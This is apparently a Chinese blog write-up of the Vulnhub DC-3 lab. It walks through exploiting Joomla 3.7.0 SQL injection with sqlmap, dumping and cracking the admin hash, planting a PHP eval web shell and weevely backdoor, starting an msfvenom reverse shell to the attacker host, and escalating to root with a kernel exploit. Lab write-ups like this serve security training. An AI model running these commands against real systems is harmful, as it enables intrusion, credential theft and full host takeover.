- 1okhttp的使用以及 post json进行请求数据_okhttputil.postjson
- 2【git-http】Windows中git输错密码后不能重新输入的问题_git凭据删除
- 3postman 接口测试入门到精通_精通postman接口测试博客
- 4Hadoop搭建之 start-yarn.sh 报错_start-yarn.sh报错
- 5SQL Server 的命名规则_sql server 数据库名称命名规则
- 6【小沐学Python】Python实现WebUI网页图表(gradio)_python webui demo
- 7CTFshow-Web入门-信息泄露_\u4f60\u8d62\u4e86\uff0c\u53bb\u5e7a\u5e7a\u96f6\u
- 8BugKu-Web_您需要传入一个名为flag的参数。
- 9Description Resource Path Location TypeCannot change version of project facet Dynamic Web Module to_descriptionresourcepathlocationtype cannot change
- 10Python 自动化操作 Excel 看这一篇就够了,办公效率直线提升︕_python excel
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权_dc系列的用户和密码
赞
踩
因为中途靶机电脑关了所以靶机ip变了
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
搭建测试靶机
下载地址:DC: 3.2 ~ VulnHub
则靶机DC-3 ip:192.168.1.106(NAT连接)
攻击机kali linux ip:192.168.1.237
信息收集
使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机
对目标靶机进行端口扫描
利用nmap对目标主机进行端口扫描,发现开放端口:80
使用命令:nmap -A -p- -T4 192.168.1.106
我们发现nmap扫描出此站点是由joomla搭建而成的
目录扫描
dirb http://192.168.1.106
访问:http://192.168.1.106/administrator/发现是一个后台登陆页面
知道网站用的是joomla cms,那我们就可以使用joomscan扫描工具扫描Joomla相关配置内容、已知漏洞等:
命令:joomscan --url http://192.168.1.106
发现 joomla 的版本为 3.7.0
这里若不适用nmap扫描也可以直接搜索joomla 3.7.0出现的漏洞:
searchsploit joomla 3.7.0
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
漏洞利用
使用sqlmap
爆表库
sqlmap -u "http://192.168.1.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
爆表
sqlmap -u "http://192.168.6.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb --tables
找到了名为# __users表,其中保存了用户名和密码信息;
爆列
sqlmap -u "http://192.168.1.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --columns -T '#__users' -D joomladb --batch
爆字段
sqlmap -u "http://192.168.1.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dump 'username,password' -T '#__users' -D joomladb
用户名:admin
密码:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
利用johnny暴力破解,得到了明文密码为snoopy
进行提权
进入网站后台管理主页面(http://192.168.6.138/administrator/index.php),具体操作如下:
点击页面右侧的“ Templates ” ——> 再点击“ Templates ” ——> 点击“ Beez3 Details and Files ” ——> 点击“ index.php ”,进入网页源码。
其中登录后台管理的用户名和密码如下:
用户名:admin
密码:snoopy
登录之后找到这个页面
—》
在index.php中添加一句话木马并 save保存
<?php @eval($_POST['qwe']);?>
这样我们就可以用蚁剑进行连接
获得了一个非登录非交互式shell,权限为www-data
所以我们需要提升其为交互式shell
思路为:生成一个反弹木马——插入网站文件中(上述index.php中)——拿shell
生成一个后门木马:
weevely generate 123 shell.php
cat shell.php 查看生成的木马,并复制到index.php当中并保存
没有发现具有suid权限目录
但find发现sudo具有suid权限,遗憾的是无法使用:
- ls -al //看有没有suid权限,若具有suid权限,文件权限应为 drwsr,此处没有
-
- find / -perm -4000 //查看具有suid权限的文件
看看有没有内核漏洞吧,查看系统信息:
- uname -a
- lsb_release -a
搜索Ubuntu 16.04具有的漏洞(kali下):
searchsploit Ubuntu 16.04
cat ./usr/share/exploitdb/exploits/linux/local/39772.txt
可以看出下载这个
将下载好的包用蚁剑上传exploit.tar这个包到/tmp目录下
并解压 tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit/
./compile.sh
./doubleput
如果提权就直接拿下!不行就换一中shell环境
其他shell环境
使用msf建立反弹shell
执行:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 > msfshell.php
这里的ip为kali ip
生成php的反弹shell:这里我ip写错了打开文件改了一下
将shell上传到DC-3主机中,然后使用msfconsole连接。
依次执行:
use exploit/multi/handler
set PAYLOAD /php/meterpreter/reverse_tcp
set LHOST 192.168.1.37
set PORT 4444
run
然后浏览器访问http://192.168.1.31/templates/beez3/msfshell.php
shell
python -c 'import pty; pty.spawn("/bin/bash")'
到之前解压的文件路径下按之前的运行:
./doubleput
就提权了
